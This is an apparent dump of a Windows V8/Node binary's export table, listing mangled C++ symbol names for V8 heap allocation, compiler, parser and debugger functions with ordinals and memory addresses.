                                                                                                                                                                                                        ?AllocatePageSize@BoundedPageAllocator@base@v8@@UEAA_KXZ31550x140078d20
                                                                                                                                                                                                        ?AllocatePageSize@OS@base@v8@@CA_KXZ31560x140e5fcc0
                                                                                                                                                                                                        ?AllocatePageSize@PageAllocator@base@v8@@UEAA_KXZ31570x140078d50
                                                                                                                                                                                                        ?AllocatePageSize@internal@v8@@YA_KXZ31580x1406b5610
                                                                                                                                                                                                        ?AllocatePages@BoundedPageAllocator@base@v8@@UEAAPEAXPEAX_K1W4Permission@PageAllocator@3@@Z31590x140e689b0
                                                                                                                                                                                                        ?AllocatePages@PageAllocator@base@v8@@UEAAPEAXPEAX_K1W4Permission@13@@Z31600x140e635e0
                                                                                                                                                                                                        ?AllocatePages@internal@v8@@YAPEAXPEAVPageAllocator@2@PEAX_K2W4Permission@32@@Z31610x1406b5630
                                                                                                                                                                                                        ?AllocatePagesAt@BoundedPageAllocator@base@v8@@QEAA_N_K0W4Permission@PageAllocator@3@@Z31620x140e68a50
                                                                                                                                                                                                        ?AllocateParameter@DeclarationScope@internal@v8@@AEAAXPEAVVariable@23@H@Z31630x140af2e80
                                                                                                                                                                                                        ?AllocateParameterLocals@DeclarationScope@internal@v8@@QEAAXXZ31640x140af2f60
                                                                                                                                                                                                        ?AllocateRaw@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z31650x1409e01f0
                                                                                                                                                                                                        ?AllocateRaw@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z31660x1409e0210
                                                                                                                                                                                                        ?AllocateRaw@CodeLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z31670x1409a4710
                                                                                                                                                                                                        ?AllocateRaw@Factory@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z31680x1409ce290
                                                                                                                                                                                                        ?AllocateRaw@LocalFactory@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z31690x1409a4010
                                                                                                                                                                                                        ?AllocateRaw@LocalHeap@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z31700x1406d6c40
                                                                                                                                                                                                        ?AllocateRaw@NewLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z31710x1409a4730
                                                                                                                                                                                                        ?AllocateRaw@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31720x140482180
                                                                                                                                                                                                        ?AllocateRaw@OldLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z31730x1409a4b10
                                                                                                                                                                                                        ?AllocateRaw@PagedSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31740x1404822e0
                                                                                                                                                                                                        ?AllocateRaw@ReadOnlySpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@@Z31750x140962e60
                                                                                                                                                                                                        ?AllocateRaw@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@W4AllocationType@34@W4AllowLargeObjects@34@@Z31760x140f4b730
                                                                                                                                                                                                        ?AllocateRawAligned@NewSpace@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31770x14096f030
                                                                                                                                                                                                        ?AllocateRawAligned@PagedSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31780x140482400
                                                                                                                                                                                                        ?AllocateRawArray@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z31790x1409e0230
                                                                                                                                                                                                        ?AllocateRawArray@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z31800x1409e02d0
                                                                                                                                                                                                        ?AllocateRawBackground@OldLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@PEAVLocalHeap@23@H@Z31810x1409a4b30
                                                                                                                                                                                                        ?AllocateRawFixedArray@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z31820x1409e0370
                                                                                                                                                                                                        ?AllocateRawFixedArray@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z31830x1409e03b0
                                                                                                                                                                                                        ?AllocateRawOneByteInternalizedString@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqOneByteString@internal@v8@@@23@HI@Z31840x1409e03f0
                                                                                                                                                                                                        ?AllocateRawOneByteInternalizedString@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqOneByteString@internal@v8@@@23@HI@Z31850x1409e04f0
                                                                                                                                                                                                        ?AllocateRawOrFail@LocalHeap@internal@v8@@QEAA_KHW4AllocationType@23@W4AllocationOrigin@23@W4AllocationAlignment@23@@Z31860x1406d6dc0
                                                                                                                                                                                                        ?AllocateRawSlow@NewSpace@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31870x14096f140
                                                                                                                                                                                                        ?AllocateRawSlow@PagedSpace@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31880x140964550
                                                                                                                                                                                                        ?AllocateRawSynchronized@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z31890x140482560
                                                                                                                                                                                                        ?AllocateRawTwoByteInternalizedString@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqTwoByteString@internal@v8@@@23@HI@Z31900x1409e05e0
                                                                                                                                                                                                        ?AllocateRawTwoByteInternalizedString@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqTwoByteString@internal@v8@@@23@HI@Z31910x1409e06d0
                                                                                                                                                                                                        ?AllocateRawUnaligned@NewSpace@internal@v8@@AEAA?AVAllocationResult@23@HW4AllocationOrigin@23@@Z31920x14096f160
                                                                                                                                                                                                        ?AllocateRawUnaligned@PagedSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationOrigin@23@@Z31930x1404826d0
                                                                                                                                                                                                        ?AllocateRawWeakArrayList@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z31940x1409e07c0
                                                                                                                                                                                                        ?AllocateRawWeakArrayList@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z31950x1409e0800
                                                                                                                                                                                                        ?AllocateRawWithAllocationSite@Factory@internal@v8@@AEAA?AVHeapObject@23@V?$Handle@VMap@internal@v8@@@23@W4AllocationType@23@V?$Handle@VAllocationSite@internal@v8@@@23@@Z31960x1409ce2c0
                                                                                                                                                                                                        ?AllocateRawWithImmortalMap@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@VMap@23@W4AllocationAlignment@23@@Z31970x1409e0840
                                                                                                                                                                                                        ?AllocateRawWithImmortalMap@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@VMap@23@W4AllocationAlignment@23@@Z31980x1409e0870
                                                                                                                                                                                                        ?AllocateReceiver@DeclarationScope@internal@v8@@QEAAXXZ31990x140af3190
                                                                                                                                                                                                        ?AllocateRegion@RegionAllocator@base@v8@@QEAA_KPEAVRandomNumberGenerator@23@_K@Z32000x140e6c910
                                                                                                                                                                                                        ?AllocateRegion@RegionAllocator@base@v8@@QEAA_K_K@Z32010x140e6c9b0
                                                                                                                                                                                                        ?AllocateRegionAt@RegionAllocator@base@v8@@QEAA_N_K0W4RegionState@123@@Z32020x140e6ca40
                                                                                                                                                                                                        ?AllocateRegister@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@@Z32030x1408f7e50
                                                                                                                                                                                                        ?AllocateRegistersForTesting@Pipeline@compiler@internal@v8@@SA_NPEBVRegisterConfiguration@34@PEAVInstructionSequence@234@_N2@Z32040x140f0e440
                                                                                                                                                                                                        ?AllocateRegularInOldGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ32050x140f556b0
                                                                                                                                                                                                        ?AllocateRegularInOldGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ32060x140f58c10
                                                                                                                                                                                                        ?AllocateRegularInYoungGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ32070x140f55740
                                                                                                                                                                                                        ?AllocateRegularInYoungGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ32080x140f58c70
                                                                                                                                                                                                        ?AllocateReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVSmi@34@@Z32090x1408f5000
                                                                                                                                                                                                        ?AllocateSavedCalleeRegisterSlots@Frame@compiler@internal@v8@@QEAAXH@Z32100x1404bb330
                                                                                                                                                                                                        ?AllocateSegment@AccountingAllocator@internal@v8@@QEAAPEAVSegment@23@_K_N@Z32110x1406ac050
                                                                                                                                                                                                        ?AllocateSharedPages@PageAllocator@base@v8@@UEAA?AV?$unique_ptr@VSharedMemory@PageAllocator@v8@@U?$default_delete@VSharedMemory@PageAllocator@v8@@@std@@@std@@_KPEBX@Z32120x140078e00
                                                                                                                                                                                                        ?AllocateSourceRangeMap@ParseInfo@internal@v8@@QEAAXXZ32130x1407b2540
                                                                                                                                                                                                        ?AllocateSpillSlot@Frame@compiler@internal@v8@@QEAAHHH@Z32140x1404bb340
                                                                                                                                                                                                        ?AllocateStackSlot@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z32150x140af3270
                                                                                                                                                                                                        ?AllocateStackSpace@TurboAssembler@internal@v8@@QEAAXH@Z32160x140500da0
                                                                                                                                                                                                        ?AllocateStackSpace@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z32170x140500ec0
                                                                                                                                                                                                        ?AllocateUnaligned@AlignedSlotAllocator@internal@v8@@QEAAHH@Z32180x140ab4ba0
                                                                                                                                                                                                        ?AllocateVariables@DeclarationScope@internal@v8@@AEAA_NPEAVParseInfo@23@@Z32190x140af32c0
                                                                                                                                                                                                        ?AllocateVariablesRecursively@Scope@internal@v8@@AEAAXXZ32200x140af3370
                                                                                                                                                                                                        ?AllocateWasmMemory@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_K1W4SharedFlag@23@@Z32210x1408c9290
                                                                                                                                                                                                        ?AllocatedBytesAtLastGC@BasePage@internal@cppgc@@QEBA_KXZ32220x140464710
                                                                                                                                                                                                        ?AllocatedBytesAtLastGC@LargePage@internal@cppgc@@QEBA_KXZ32230x14044fa70
                                                                                                                                                                                                        ?AllocatedBytesAtLastGC@NormalPage@internal@cppgc@@QEBA_KXZ32240x140078e80
                                                                                                                                                                                                        ?AllocatedExternalMemorySinceMarkCompact@Heap@internal@v8@@AEAA_KXZ32250x1409b0000
                                                                                                                                                                                                        ?AllocatedObjectSizeDecreased@CppHeap@internal@v8@@UEAAX_K@Z32260x1409e9380
                                                                                                                                                                                                        ?AllocatedObjectSizeIncreased@CppHeap@internal@v8@@UEAAX_K@Z32270x1409e93e0
                                                                                                                                                                                                        ?AllocatedObjectSizeSafepointImpl@StatsCollector@internal@cppgc@@AEAAXXZ32280x1404558a0
                                                                                                                                                                                                        ?AllocatedSinceLastGC@NewSpace@internal@v8@@QEAA_KXZ32290x1404827e0
                                                                                                                                                                                                        ?AllocationBase@Contents@ArrayBuffer@v8@@QEBAPEAXXZ32300x140078d20
                                                                                                                                                                                                        ?AllocationBase@Contents@SharedArrayBuffer@v8@@QEBAPEAXXZ32310x140078d20
                                                                                                                                                                                                        ?AllocationLength@Contents@ArrayBuffer@v8@@QEBA_KXZ32320x140078d30
                                                                                                                                                                                                        ?AllocationLength@Contents@SharedArrayBuffer@v8@@QEBA_KXZ32330x140078d30
                                                                                                                                                                                                        ?AllocationMode@Contents@ArrayBuffer@v8@@QEBA?AW40Allocator@23@XZ32340x140078d40
                                                                                                                                                                                                        ?AllocationMode@Contents@SharedArrayBuffer@v8@@QEBA?AW40Allocator@ArrayBuffer@3@XZ32350x140078d40
                                                                                                                                                                                                        ?AllocationSize@LargePage@internal@cppgc@@SA_K_K@Z32360x140342df0
                                                                                                                                                                                                        ?AllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANN@Z32370x1409c8430
                                                                                                                                                                                                        ?AllocatorLimitOnMaxOldGenerationSize@Heap@internal@v8@@SA_KXZ32380x1409b0150
                                                                                                                                                                                                        ?AllowCodeGenerationFromStrings@Context@v8@@QEAAX_N@Z32390x140b08650
                                                                                                                                                                                                        ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SA_NXZ32400x14007a0b0
                                                                                                                                                                                                        ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SA_NXZ32410x14007a0b0
                                                                                                                                                                                                        ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SA_NXZ32420x14007a0b0
                                                                                                                                                                                                        ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SA_NXZ32430x14007a0b0
                                                                                                                                                                                                        ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SA_NXZ32440x14007a0b0
                                                                                                                                                                                                        ?AllowVarArgs@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SA_NXZ32450x14007a0b0
                                                                                                                                                                                                        ?AllowVarArgs@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ32460x1404bb3e0
                                                                                                                                                                                                        ?AllowWasmCodeGenerationCallback@node@@YA_NV?$Local@VContext@v8@@@v8@@V?$Local@VString@v8@@@3@@Z32470x14028c2a0
                                                                                                                                                                                                        ?AllowsLazyCompilation@DeclarationScope@internal@v8@@QEBA_NXZ32480x140af33d0
                                                                                                                                                                                                        ?AllowsLazyParsingWithoutUnresolvedVariables@Parser@internal@v8@@AEBA_NXZ32490x140773690
                                                                                                                                                                                                        ?AllowsLazyParsingWithoutUnresolvedVariables@Scope@internal@v8@@QEBA_NPEBV123@@Z32500x140af33f0
                                                                                                                                                                                                        ?Ambiguous@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB32510x141ff9a30
                                                                                                                                                                                                        ?AmountOfPhysicalMemory@SysInfo@base@v8@@SA_JXZ32520x140e6c320
                                                                                                                                                                                                        ?AmountOfVirtualMemory@SysInfo@base@v8@@SA_JXZ32530x14007a0a0
                                                                                                                                                                                                        ?Analyze@BytecodeAnalysis@compiler@internal@v8@@AEAAXXZ32540x141097400
                                                                                                                                                                                                        ?Analyze@DeclarationScope@internal@v8@@SA_NPEAVParseInfo@23@@Z32550x140af3420
                                                                                                                                                                                                        ?AnalyzeLoopAssignmentForTesting@wasm@internal@v8@@YAPEAVBitVector@23@PEAVZone@23@IPEBE1@Z32560x1405c28d0
                                                                                                                                                                                                        ?AnalyzePartially@DeclarationScope@internal@v8@@QEAAXPEAVParser@23@PEAVAstNodeFactory@23@_N@Z32570x140af34e0
                                                                                                                                                                                                        ?AnalyzePartially@Scope@internal@v8@@AEAAXPEAVDeclarationScope@23@PEAVAstNodeFactory@23@PEAV?$ThreadedListBase@VVariableProxy@internal@v8@@UEmptyBase@base@3@UUnresolvedNext@123@@base@3@_N@Z32580x140af3630
                                                                                                                                                                                                        ?And@SharedTurboAssembler@internal@v8@@QEAAXVRegister@23@VImmediate@23@@Z32590x1404e2220
                                                                                                                                                                                                        ?AnnotateStrongRetainer@GlobalHandles@internal@v8@@SAXPEA_KPEBD@Z32600x140078e60
                                                                                                                                                                                                        ?AnnotateStrongRetainer@V8@v8@@CAXPEA_KPEBD@Z32610x140b08730
                                                                                                                                                                                                        ?Any@FieldType@internal@v8@@SA?AV?$Handle@VFieldType@internal@v8@@@23@PEAVIsolate@23@@Z32620x140878210
                                                                                                                                                                                                        ?Any@Type@compiler@internal@v8@@SA?AV1234@XZ32630x1404bb3f0
                                                                                                                                                                                                        ?ApiGetter@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z32640x140ab1fd0
                                                                                                                                                                                                        ?Append@FreeList@internal@cppgc@@QEAAX$$QEAV123@@Z32650x140466b10
                                                                                                                                                                                                        ?AppendAsClientIsolate@Isolate@internal@v8@@AEAAXPEAV123@@Z32660x140a0bbe0
                                                                                                                                                                                                        ?AppendAsTraceFormat@TracedValue@tracing@v8@@UEBAXPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z32670x1406b6a40
                                                                                                                                                                                                        ?AppendBoolean@TracedValue@tracing@v8@@QEAAX_N@Z32680x1406b6b00
                                                                                                                                                                                                        ?AppendDeoptimizeArguments@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@W4DeoptimizeKind@34@W4DeoptimizeReason@34@IAEBUFeedbackSource@234@VFrameState@234@@Z32690x140ed4290
                                                                                                                                                                                                        ?AppendDouble@TracedValue@tracing@v8@@QEAAXN@Z32700x1406b6b90
                                                                                                                                                                                                        ?AppendInput@Node@compiler@internal@v8@@QEAAXPEAVZone@34@PEAV1234@@Z32710x140ea27b0
                                                                                                                                                                                                        ?AppendInteger@TracedValue@tracing@v8@@QEAAXH@Z32720x1406b6c70
                                                                                                                                                                                                        ?AppendNaryOperationSourceRange@Parser@internal@v8@@AEAAXPEAVNaryOperation@23@AEBUSourceRange@23@@Z32730x1407736d0
                                                                                                                                                                                                        ?AppendPhiInput@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@0@Z32740x14108c0a0
                                                                                                                                                                                                        ?AppendString@TracedValue@tracing@v8@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z32750x1406b6d50
                                                                                                                                                                                                        ?AppendString@TracedValue@tracing@v8@@QEAAXPEBD@Z32760x1406b6d60
                                                                                                                                                                                                        ?AppendUse@Node@compiler@internal@v8@@AEAAXPEAUUse@1234@@Z32770x140ea2a00
                                                                                                                                                                                                        ?Apply@BookmarkScope@Scanner@internal@v8@@QEAAXXZ32780x140764c70
                                                                                                                                                                                                        ?ApplyBreakPoints@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z32790x140a5cf10
                                                                                                                                                                                                        ?ApplyDebugBreak@BytecodeArrayIterator@interpreter@internal@v8@@QEAAXXZ32800x140913750
                                                                                                                                                                                                        ?ApplyForwarding@JumpThreading@compiler@internal@v8@@SAXPEAVZone@34@AEBV?$ZoneVector@VRpoNumber@compiler@internal@v8@@@34@PEAVInstructionSequence@234@@Z32810x140f6da10
                                                                                                                                                                                                        ?ApplyPersistentHandleVisitor@GlobalHandles@internal@v8@@AEAAXPEAVPersistentHandleVisitor@3@PEAVNode@123@@Z32820x1409f5520
                                                                                                                                                                                                        ?ApplySideEffectChecks@Debug@internal@v8@@QEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z32830x140a5d190
                                                                                                                                                                                                        ?ApplyTransitionToDataProperty@LookupIterator@internal@v8@@QEAAXV?$Handle@VJSReceiver@internal@v8@@@23@@Z32840x14081bbf0
                                                                                                                                                                                                        ?ArchiveDebug@Debug@internal@v8@@QEAAPEADPEAD@Z32850x140a5d220
                                                                                                                                                                                                        ?ArchiveSpacePerThread@Debug@internal@v8@@SAHXZ32860x1400e9c00
                                                                                                                                                                                                        ?ArchiveSpacePerThread@Isolate@internal@v8@@SAHXZ32870x140482880
                                                                                                                                                                                                        ?ArchiveSpacePerThread@StackGuard@internal@v8@@SAHXZ32880x1400b1030
                                                                                                                                                                                                        ?ArchiveStackGuard@StackGuard@internal@v8@@QEAAPEADPEAD@Z32890x140a00740
                                                                                                                                                                                                        ?ArchiveThread@Isolate@internal@v8@@QEAAPEADPEAD@Z32900x140a0c530
                                                                                                                                                                                                        ?AreAliases@RegisterConfiguration@internal@v8@@QEBA_NW4MachineRepresentation@23@H0H@Z32910x140a814e0
                                                                                                                                                                                                        ?AreContiguous@Register@interpreter@internal@v8@@SA_NV1234@0000@Z32920x1408f7770
                                                                                                                                                                                                        ?AreKeysEqual@StateValuesCache@compiler@internal@v8@@CA_NPEAX0@Z32930x140f56f80
                                                                                                                                                                                                        ?AreMovesRedundant@Instruction@compiler@internal@v8@@QEBA_NXZ32940x140ea8bb0
                                                                                                                                                                                                        ?AreSourcePositionsAvailable@FrameSummary@internal@v8@@QEBA_NXZ32950x140a20720
                                                                                                                                                                                                        ?AreValueKeysEqual@StateValuesCache@compiler@internal@v8@@CA_NPEAUStateValuesKey@1234@0@Z32960x140f56fc0
                                                                                                                                                                                                        ?AreWasmExceptionsEnabled@Isolate@internal@v8@@QEAA_NV?$Handle@VContext@internal@v8@@@23@@Z32970x140a0c5c0
                                                                                                                                                                                                        ?AreaSize@PagedSpace@internal@v8@@QEAAHXZ32980x140482890
                                                                                                                                                                                                        ?ArgumentCount@CFunction@v8@@QEBAIXZ32990x14007a1c0
                                                                                                                                                                                                        ?ArgumentCount@CFunctionInfo@v8@@QEBAIXZ33000x14007a150
                                                                                                                                                                                                        ?ArgumentInfo@CFunction@v8@@QEBAAEBVCTypeInfo@2@I@Z33010x14007a1b0
                                                                                                                                                                                                        ?ArgumentInfo@CFunctionInfo@v8@@QEBAAEBVCTypeInfo@2@I@Z33020x140b08890
                                                                                                                                                                                                        ?ArgumentStackSlotsForCFunctionCall@TurboAssembler@internal@v8@@QEAAHH@Z33030x140501020
                                                                                                                                                                                                        ?Arguments@AsmFunctionType@wasm@internal@v8@@QEBA?BV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@XZ33040x1406322a0
                                                                                                                                                                                                        ?ArgumentsElementsState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z33050x140eb2260
                                                                                                                                                                                                        ?ArgumentsLength@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ33060x140f4b810
                                                                                                                                                                                                        ?ArgumentsLengthState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ33070x140eb2300
                                                                                                                                                                                                        ?Arguments_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33080x1404828a0
                                                                                                                                                                                                        ?Arguments_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33090x1406cd3a0
                                                                                                                                                                                                        ?Array@Type@compiler@internal@v8@@SA?AV1234@XZ33100x1404bb400
                                                                                                                                                                                                        ?ArrayBuffer_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33110x1404828b0
                                                                                                                                                                                                        ?ArrayBuffer_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33120x1406cd3b0
                                                                                                                                                                                                        ?ArrayConstructorStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ33130x140f557d0
                                                                                                                                                                                                        ?ArrayIterator_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33140x1404828c0
                                                                                                                                                                                                        ?ArrayIterator_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33150x1406cd3c0
                                                                                                                                                                                                        ?ArrayLiteralFromListWithSpread@Parser@internal@v8@@AEAAPEAVArrayLiteral@23@AEBV?$ScopedList@PEAVExpression@internal@v8@@PEAX@23@@Z33160x1407a3a40
                                                                                                                                                                                                        ?ArrayNoArgumentConstructor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ElementsKind@23@W4AllocationSiteOverrideMode@23@@Z33170x140ab1ff0
                                                                                                                                                                                                        ?ArrayOrOtherObject@Type@compiler@internal@v8@@SA?AV1234@XZ33180x1404bb410
                                                                                                                                                                                                        ?ArrayOrProxy@Type@compiler@internal@v8@@SA?AV1234@XZ33190x1404bb420
                                                                                                                                                                                                        ?ArraySingleArgumentConstructor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ElementsKind@23@W4AllocationSiteOverrideMode@23@@Z33200x140ab2120
                                                                                                                                                                                                        ?Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33210x1404828d0
                                                                                                                                                                                                        ?Array_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ33220x1406cd3d0
                                                                                                                                                                                                        ?AsAccessorInfo@ObjectRef@compiler@internal@v8@@QEBA?AVAccessorInfoRef@234@XZ33230x140e81ac0
                                                                                                                                                                                                        ?AsAllocationSite@ObjectRef@compiler@internal@v8@@QEBA?AVAllocationSiteRef@234@XZ33240x140e81b70
                                                                                                                                                                                                        ?AsArray@Map@v8@@QEBA?AV?$Local@VArray@v8@@@2@XZ33250x140b088a0
                                                                                                                                                                                                        ?AsArray@Set@v8@@QEBA?AV?$Local@VArray@v8@@@2@XZ33260x140b08950
                                                                                                                                                                                                        ?AsArrayBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVArrayBoilerplateDescriptionRef@234@XZ33270x140e81c20
                                                                                                                                                                                                        ?AsBase@CppHeap@internal@v8@@QEAAAEAVHeapBase@2cppgc@@XZ33280x140078ac0
                                                                                                                                                                                                        ?AsBase@CppHeap@internal@v8@@QEBAAEBVHeapBase@2cppgc@@XZ33290x140078ac0
                                                                                                                                                                                                        ?AsBase@Heap@internal@cppgc@@QEAAAEAVHeapBase@23@XZ33300x140078ac0
                                                                                                                                                                                                        ?AsBase@Heap@internal@cppgc@@QEBAAEBVHeapBase@23@XZ33310x140078ac0
                                                                                                                                                                                                        ?AsBigInt@ObjectRef@compiler@internal@v8@@QEBA?AVBigIntRef@234@XZ33320x140e81cd0
                                                                                                                                                                                                        ?AsBitset@Type@compiler@internal@v8@@AEBAIXZ33330x1404bb430
                                                                                                                                                                                                        ?AsBitsetForTesting@Type@compiler@internal@v8@@QEAAIXZ33340x1404bb430
                                                                                                                                                                                                        ?AsBytecodeArray@ObjectRef@compiler@internal@v8@@QEBA?AVBytecodeArrayRef@234@XZ33350x140e81d50
                                                                                                                                                                                                        ?AsCallHandlerInfo@ObjectRef@compiler@internal@v8@@QEBA?AVCallHandlerInfoRef@234@XZ33360x140e81e00
                                                                                                                                                                                                        ?AsCallableType@AsmType@wasm@internal@v8@@QEAAPEAVAsmCallableType@234@XZ33370x140632360
                                                                                                                                                                                                        ?AsCell@ObjectRef@compiler@internal@v8@@QEBA?AVCellRef@234@XZ33380x140e81eb0
                                                                                                                                                                                                        ?AsClassScope@Scope@internal@v8@@QEAAPEAVClassScope@23@XZ33390x140078ac0
                                                                                                                                                                                                        ?AsClassScope@Scope@internal@v8@@QEBAPEBVClassScope@23@XZ33400x140078ac0
                                                                                                                                                                                                        ?AsCode@ObjectRef@compiler@internal@v8@@QEBA?AVCodeRef@234@XZ33410x140e81f60
                                                                                                                                                                                                        ?AsCodeDataContainer@ObjectRef@compiler@internal@v8@@QEBA?AVCodeDataContainerRef@234@XZ33420x140e82010
                                                                                                                                                                                                        ?AsContext@ObjectRef@compiler@internal@v8@@QEBA?AVContextRef@234@XZ33430x140e820c0
                                                                                                                                                                                                        ?AsDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ33440x140078ac0
                                                                                                                                                                                                        ?AsDeclarationScope@Scope@internal@v8@@QEBAPEBVDeclarationScope@23@XZ33450x140078ac0
                                                                                                                                                                                                        ?AsDescriptorArray@ObjectRef@compiler@internal@v8@@QEBA?AVDescriptorArrayRef@234@XZ33460x140e82190
                                                                                                                                                                                                        ?AsDouble@AsmJsScanner@internal@v8@@QEBANXZ33470x140636680
                                                                                                                                                                                                        ?AsElementsKind@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@W4ElementsKind@23@@Z33480x14080ece0
                                                                                                                                                                                                        ?AsElementsKind@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@W4ElementsKind@34@@Z33490x140e82240
                                                                                                                                                                                                        ?AsFeedbackCell@ObjectRef@compiler@internal@v8@@QEBA?AVFeedbackCellRef@234@XZ33500x140e82600
                                                                                                                                                                                                        ?AsFeedbackVector@ObjectRef@compiler@internal@v8@@QEBA?AVFeedbackVectorRef@234@XZ33510x140e826b0
                                                                                                                                                                                                        ?AsFixedArray@ObjectRef@compiler@internal@v8@@QEBA?AVFixedArrayRef@234@XZ33520x140e82730
                                                                                                                                                                                                        ?AsFixedArrayBase@ObjectRef@compiler@internal@v8@@QEBA?AVFixedArrayBaseRef@234@XZ33530x140e827b0
